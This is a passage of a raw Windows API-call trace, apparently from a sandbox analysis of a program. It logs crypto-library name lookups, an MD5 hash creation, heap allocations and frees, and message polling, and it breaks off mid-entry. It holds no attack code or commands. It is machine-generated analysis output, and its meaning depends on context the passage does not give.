[0236.967] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0236.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04498 | out: hHeap=0x970000) returned 1 [0236.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0236.967] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0236.967] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0236.967] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0236.967] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0236.967] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0236.967] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0236.967] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0236.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f738 | out: hHeap=0x970000) returned 1 [0236.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0236.967] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0236.968] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0236.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04690 | out: hHeap=0x970000) returned 1 [0236.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0236.968] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0236.968] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0236.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0236.968] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0236.968] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0236.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04150 | out: hHeap=0x970000) returned 1 [0236.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0236.968] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0236.968] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0236.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0236.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0236.968] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0236.968] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0236.968] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0236.969] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0236.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04700 | out: hHeap=0x970000) returned 1 [0236.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0236.969] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0236.969] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0236.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f7d8 | out: hHeap=0x970000) returned 1 [0236.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0236.969] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0236.969] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0236.969] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0236.969] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2e51598, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0236.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0236.969] GetProcAddress (hModule=0x756e0000, lpProcName="CryptCreateHash") returned 0x756feed0 [0236.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0236.970] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0236.970] CryptCreateHash (in: hProv=0xa5f958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0236.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0236.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c08 [0236.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0236.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0236.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0236.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0236.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0236.970] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0236.970] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0236.970] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0236.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0236.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0236.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0236.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0236.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0236.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0236.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0236.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0236.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0236.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0236.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0236.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0236.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0236.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0236.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0236.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0236.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0236.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0236.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0236.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0236.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0236.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0236.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0236.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0236.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0236.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0236.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0236.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0236.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0236.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0236.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0236.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0236.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0236.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0236.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0236.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0236.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0236.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0236.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0236.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0236.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f738 | out: hHeap=0x970000) returned 1 [0236.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0236.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0236.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0236.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0236.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0236.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0236.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0236.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0236.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0236.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0236.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0236.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0236.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0236.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0236.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0236.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0236.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0236.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0236.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0236.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0236.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0236.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0236.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0236.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0236.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0236.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0236.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0236.974] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0236.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0236.974] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0236.974] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0236.974] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0236.974] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0236.974] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b68 [0236.974] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0236.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0236.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0236.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0236.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0237.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0237.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0237.046] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0237.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0237.046] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0237.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0237.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0237.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0237.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0237.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0237.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0237.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0237.047] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0237.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0237.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0237.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0237.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0237.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0237.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0237.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c28 [0237.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0237.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0237.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0237.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0237.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0237.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54ff8 [0237.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0237.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0237.047] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0237.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0237.047] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e55028, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0237.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0237.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0237.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0237.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0237.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0237.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0237.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0237.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0237.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0237.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0237.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0237.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0237.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0237.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0237.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0237.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0237.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0237.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0237.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0237.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c28 | out: hHeap=0x970000) returned 1 [0237.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0237.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0237.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a28 [0237.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0237.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0237.048] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0237.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977cc8 [0237.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0237.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0237.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0237.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0237.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0237.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0237.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0237.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0237.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0237.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0237.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0237.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0237.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0237.049] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0237.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0237.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0237.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0237.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a68 [0237.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977cf8 [0237.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0237.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0237.050] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0237.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0237.050] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54fb8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0237.050] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0237.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0237.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0237.050] RtlAllocateHeap (HeapHandle=0x970000, 